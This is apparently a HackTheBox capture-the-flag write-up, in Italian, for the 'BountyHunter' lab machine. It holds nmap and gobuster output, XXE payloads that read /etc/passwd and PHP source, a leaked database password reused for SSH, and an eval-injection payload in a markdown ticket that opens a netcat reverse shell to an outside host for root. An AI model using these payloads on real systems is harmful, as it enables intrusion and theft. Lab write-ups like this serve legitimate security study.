&ent;

#+TITLE: HTB - BountyHunter
#+AUTHOR: Leonardo Tamiano

* Enumeration
** nmap
*** leo@kali:~/repos/bountyhunter$ nmap -sC -sV bountyhunter
    #+begin_example
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-30 11:25 CET
Nmap scan report for bountyhunter (10.129.95.166)
Host is up (0.052s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 (RSA)
|   256 a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 (ECDSA)
|_  256 a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Bounty Hunters
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.or
g/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.69 seconds    
    #+end_example

*** leo@kali:~/repos/bountyhunter$ nmap -p- bountyhunter
    #+begin_example
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-30 11:25 CET
Nmap scan report for bountyhunter (10.129.95.166)
Host is up (0.056s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 18.76 seconds    
    #+end_example

** XXE payload
*** file /etc/passwd
    #+begin_example
<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<bugreport>
  <title> &ent; </title>
  <cwe> 2 </cwe>
  <cvss> 3</cvss>
  <reward> 4 </reward>
</bugreport>
    
    #+end_example

    Il contenuto del file ~/etc/passwd~
    
    #+begin_example
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
development:x:1000:1000:Development:/home/development:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin    
    #+end_example
*** file /var/www/html/db.php
    
    #+begin_example
<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/db.php"> ]>
<bugreport>
  <title> &ent; </title>
  <cwe> 2 </cwe>
  <cvss> 3</cvss>
  <reward> 4 </reward>
</bugreport>

    #+end_example

    Il file, una volta decodificato, è il seguente

    #+begin_example
<?php
// TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";
?>    
    #+end_example

** gobuster
*** leo@kali:~/repos/bountyhunter$ gobuster dir -u http://bountyhunter -w ~/repos/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x php,txt
    #+begin_example
==============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://bountyhunter
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /home/leo/repos/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,txt
[+] Timeout:                 10s
===============================================================
2021/11/30 11:48:20 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 25169]
/assets               (Status: 301) [Size: 313] [--> http://bountyhunter/assets/]
/portal.php           (Status: 200) [Size: 125]                                  
/css                  (Status: 301) [Size: 310] [--> http://bountyhunter/css/]   
/db.php               (Status: 200) [Size: 0]                                    
/js                   (Status: 301) [Size: 309] [--> http://bountyhunter/js/]    
/resources            (Status: 301) [Size: 316] [--> http://bountyhunter/resources/]
Progress: 24942 / 661683 (3.77%)                                                   ^C
[!] Keyboard interrupt detected, terminating.
                                                                                    
===============================================================
2021/11/30 11:48:43 Finished
===============================================================    
    #+end_example
    
* Privilege Escalation

** development@bountyhunter
   development:m19RoAU0hP41A1sTsq6K

*** development@bountyhunter:~$ sudo -l 
    #+begin_example
Matching Defaults entries for development on bountyhunter:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User development may run the following commands on bountyhunter:
    (root) NOPASSWD: /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py    
    #+end_example
   

*** ticketValidtor.py
    Per exploitare lo script l'idea è quella di creare un file ~.md~ che
    porta lo script ad eseguire l'istruzione ~eval~

    #+begin_src python
if int(ticketCode) % 7 == 4:
    validationNumber = eval(x.replace("**", ""))
    #+end_src

    un payload che funziona è il seguente

    #+begin_example
# Skytrain Inc
## Ticket to Leonardo
__Ticket Code:__
**4+__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|/bin/nc 10.10.14.33 4321 >/tmp/f')
    #+end_example

    Se chiamiamo il python script con sudo e mettiamo la path ad un
    file ~.md~ che contiene quanto mostrato in alto, siamo in grado di
    diventare root.